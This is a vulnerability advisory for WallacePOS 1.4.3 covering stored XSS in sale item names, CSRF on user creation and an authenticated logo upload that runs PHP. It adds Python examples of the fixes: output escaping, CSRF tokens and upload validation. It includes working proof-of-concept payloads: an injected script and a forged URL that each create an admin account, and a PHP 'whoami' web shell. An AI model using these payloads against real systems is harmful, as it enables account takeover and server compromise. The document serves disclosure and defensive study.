Synopsis
CVE-2019-3958: /api/sales/add Sales Item Name Authenticated Persistent Cross-site Scripting
A persistent cross-site scripting vulnerability was found in the sale item name of a till transaction on the /api/sales/add endpoint. This vulnerability requires user interaction to be exploited successfully. This vulnerability can grant an attacker with normal user privileges the ability to perform any action authorized to an administrator.
This vulnerability is caused by the lack of input validation on the sales transaction name at the /api/sales/add endpoint. Unchecked input is stored in the application database on the server and subsequently sent to clients when they request information about a sale. This field also is displayed, unsanitized, in application administrator reports.
Proof of Concept
- Log into WallacePOS as a normal "staff" user using the application landing page at https://<your server>/.
- Click "Till" and then "Add". In the Name column add the following script (make sure you replace 127.0.0.1 with your server IP):
<script>alert("Adding joe."); $.get("https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D");</script>
- Add a unit price and then click "Process".
- Complete the sale by clicking "cash" and then "Complete".
- Choose "Cancel" when asked to print a receipt.
- Log out of the application and log back in as a WallacePOS admin user.
- Click "Sales", find the transaction you just added and then click "View".
- Notice that the JavaScript alert from the injected script is displayed, confirming the stored script ran in the administrator's browser session.
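The root cause stated above is a missing boundary on both sides: the item name is accepted unchecked and then written into HTML unescaped. The following Python is an added illustration of the two controls a fix needs (it is not WallacePOS code, which is PHP, and the sample records are constructed; the payload mirrors the PoC shape with the server address and data parameter replaced by placeholders). Output encoding at the HTML sink is the control that actually closes the hole; the input check and the triage helper for names already sitting in the database are defence in depth.

```python
import html
import re

# Constructed sample records in the shape of stored sale items. Record 3 mirrors the
# advisory's payload with a placeholder host and an elided data parameter.
SAMPLE_SALE_ITEMS = [
    {"ref": 1, "name": "Coffee, large"},
    {"ref": 2, "name": "Tea & biscuits <2 pcs>"},
    {"ref": 3, "name": '<script>alert("Adding joe."); '
                       '$.get("https://SERVER_PLACEHOLDER/api/users/add?data=...");</script>'},
]


def render_sale_row_vulnerable(item):
    """The pattern behind the finding: the stored name is interpolated into HTML as-is."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(item["ref"], item["name"])


def render_sale_row_hardened(item):
    """Contextual output encoding: every untrusted value is escaped at the point it
    enters an HTML text context, so '<script>' becomes inert '&lt;script&gt;'."""
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(str(item["ref"]), quote=True),
        html.escape(item["name"], quote=True),
    )


# Anything that looks like the opening of a markup tag ('<' followed by an optional
# slash and a letter or '!'). A bare '<2 pcs>' in a product name does not match.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def looks_like_markup(value):
    return bool(TAG_RE.search(value))


def validate_item_name(name, max_len=100):
    """Input-side check for a sales-add handler (hypothetical limits). Rejects empty,
    overlong or markup-like names. This alone is not a fix: encoding at output is."""
    if not name or len(name) > max_len:
        return False
    return not looks_like_markup(name)


def find_stored_payloads(items):
    """Triage helper: return the refs of already-stored names that contain markup, so
    existing rows can be reviewed before an administrator report renders them."""
    return [item["ref"] for item in items if looks_like_markup(item["name"])]


if __name__ == "__main__":
    for item in SAMPLE_SALE_ITEMS:
        print(render_sale_row_hardened(item))
    print("rows needing review:", find_stored_payloads(SAMPLE_SALE_ITEMS))
```

The hardened renderer treats the legitimate "Tea & biscuits <2 pcs>" and the payload identically: both are escaped, which is why output encoding is safe to apply everywhere without first deciding what is malicious.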
CVE-2019-3959: Cross-site Request Forgery
A cross-site request forgery (XSRF) vulnerability in WallacePOS 1.4.3 allows remote attackers to perform actions with the permissions of a victim user, provided the victim user has an active session and is induced to trigger the malicious request.
For instance, an attacker could convince a victim WallacePOS user to click a link that, when clicked, causes a new user to be added.
This vulnerability exists because browsers automatically include session cookies when performing requests. Therefore, if the victim user is authenticated to the site, the site cannot distinguish a forged request from a legitimate one sent by the victim's browser.
Please note that this vulnerability can be combined with the cross-site scripting vulnerability to automatically perform sensitive application actions.
Proof of Concept
(Note that the IP address must be replaced with the IP of the WallacePOS instance.)
The following PoC URL will create a user named "joe" with a password of "schmoe". If this link is sent to a victim user with sufficient privileges, and it is clicked, then the user "joe" will be created.
https://127.0.0.1/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A%22022c22c21fc47dda38e12228c1e69fbc6a9e18d9d3478927091ca4145d641862%22%2C%22admin%22%3A1%7D
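The PoC works because a state-changing action is reachable through a GET request whose only credential is the session cookie the browser attaches on its own. The following Python is an added, illustrative server-side check (not WallacePOS code; the origin, endpoint list and request dictionaries are constructed) showing the three layers a handler for /api/users/add would apply: refuse non-POST methods for state changes, verify the Origin/Referer header against the site's own origin, and require a per-session synchronizer token. The PoC URL's data parameter is decoded the same way the advisory describes so a rejection can be logged with what the request tried to do; the password hash is replaced by a placeholder.

```python
import hmac
import json
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed values: the POS instance's own origin and the endpoints that change state.
SITE_ORIGIN = "https://pos.example"
STATE_CHANGING_PREFIXES = ("/api/users/add", "/api/sales/add")

# The PoC path from the advisory, with the password hash replaced by a placeholder.
POC_PATH = ("/api/users/add?data=%7B%22username%22%3A%22joe%22%2C%22pass%22%3A"
            "%22PASSWORD_HASH_PLACEHOLDER%22%2C%22admin%22%3A1%7D")


def issue_csrf_token(session):
    """Synchronizer token: one random secret per session, embedded only in pages the
    site itself serves, so a cross-site page cannot read or guess it."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(header_value):
    """Compare scheme and host of an Origin/Referer value exactly (no prefix match,
    which would let 'https://pos.example.attacker' through)."""
    u = urlsplit(header_value)
    return f"{u.scheme}://{u.netloc}" == SITE_ORIGIN


def csrf_check(request, session):
    """Return (ok, reason). `request` models an HTTP request as a dict with keys
    method, path (including query), headers and form (the parsed POST body)."""
    path = urlsplit(request["path"]).path
    if not path.startswith(STATE_CHANGING_PREFIXES):
        return True, "not state-changing"
    # 1. A link click or <img> tag can only produce a GET; never act on one.
    if request["method"] != "POST":
        return False, "state-changing endpoint requires POST"
    # 2. Browsers send Origin on cross-site POSTs; when present it must be ours.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin is not None and not same_origin(origin):
        return False, "cross-site origin"
    # 3. The token bound to this session must be echoed back, compared in constant time.
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def parse_data_param(request):
    """Decode the JSON 'data' query parameter the PoC uses, for logging the rejected
    action (e.g. an attempted admin user creation)."""
    raw = parse_qs(urlsplit(request["path"]).query).get("data", [None])[0]
    return None if raw is None else json.loads(raw)


if __name__ == "__main__":
    session = {}
    issue_csrf_token(session)
    forged = {"method": "GET", "path": POC_PATH, "headers": {}, "form": {}}
    print(csrf_check(forged, session), parse_data_param(forged))
```

Marking the session cookie SameSite=Lax (or Strict) adds a browser-side layer on top of this, but the token check is what makes the server itself able to tell the two requests apart, which is the gap the description above names.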
CVE-2019-3960: Authenticated Unrestricted File Upload RCE
An unrestricted file upload vulnerability in WallacePOS allows a remote authenticated admin user to execute arbitrary PHP code on the server in the context of the web server process. The authenticated admin user can
browse to https:
Proof of Concept
- On your local machine, create a file named "whoami.php". Save the file with the following contents:
<?php echo exec('whoami'); ?>
- Log into WallacePOS as an administrator.
- Visit the "Settings" page. Then browse to "POS Settings".
- For the "Browser/Email Logo" choose your whoami.php file. Click "Save" at the bottom.
- In the browser, visit https://127.0.0.1/docs/whoami.php. (Be sure to replace the IP address accordingly.)
- The result will likely be 'www-data' (whatever user the web server is running as).
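The upload above succeeds because the logo handler trusts the submitted filename and stores the file where the web server will execute it. The following Python is an added illustration of the validation a logo upload handler needs (not WallacePOS code; the upload directory and helper names are assumed): allowlist image extensions, check that the bytes actually carry the declared image's magic header, reject content that embeds a PHP open tag (a polyglot), and store under a server-generated name in a directory outside the web root. The rejected inputs are constructed to match the PoC file.

```python
import os
import secrets

# Allowed extensions and the magic bytes a genuine file of that type starts with.
ALLOWED_IMAGE_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Assumed: a directory outside the document root, served without any script handler.
UPLOAD_DIR = "/var/pos-uploads"

# Constructed inputs: the PoC file body from the advisory and a minimal PNG header.
WHOAMI_PHP = b"<?php echo exec('whoami'); ?>"
PNG_HEADER = ALLOWED_IMAGE_TYPES["png"] + b"\x00" * 8


class UploadRejected(ValueError):
    pass


def validate_logo_upload(original_name, content):
    """Return the normalised extension if the upload is an acceptable image,
    otherwise raise UploadRejected with the reason."""
    base = os.path.basename(original_name)          # drop any path component
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()            # only the last extension counts
    if ext not in ALLOWED_IMAGE_TYPES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(ALLOWED_IMAGE_TYPES[ext]):
        raise UploadRejected("content does not match declared image type")
    if b"<?php" in content or b"<?=" in content:
        raise UploadRejected("embedded PHP open tag")
    return ext


def upload_decision(original_name, content):
    """Convenience wrapper returning ('accepted', ext) or ('rejected', reason)."""
    try:
        return "accepted", validate_logo_upload(original_name, content)
    except UploadRejected as exc:
        return "rejected", str(exc)


def store_logo(original_name, content):
    """Validate, then store under a random server-chosen name with a safe extension,
    so neither the attacker's filename nor its extension reaches the filesystem."""
    ext = validate_logo_upload(original_name, content)
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    print(upload_decision("whoami.php", WHOAMI_PHP))
    print(upload_decision("whoami.png", WHOAMI_PHP))
    print(store_logo("logo.png", PNG_HEADER))
```

Even with these checks, the decisive control is where the file lands: a directory the web server will not hand to the PHP interpreter, so that a file that slips through validation is served as bytes rather than executed, which is exactly what happened with /docs/whoami.php here.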
Solution
Apply version 1.4.3 security hot fixes. No solution currently exists for CSRF around the login, as WallacePOS pointed out.
Additional References
https://github.com/micwallace/wallacepos/commit/ba07ac7a60ade3bdefd5501b2c539ea170c51bbb
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.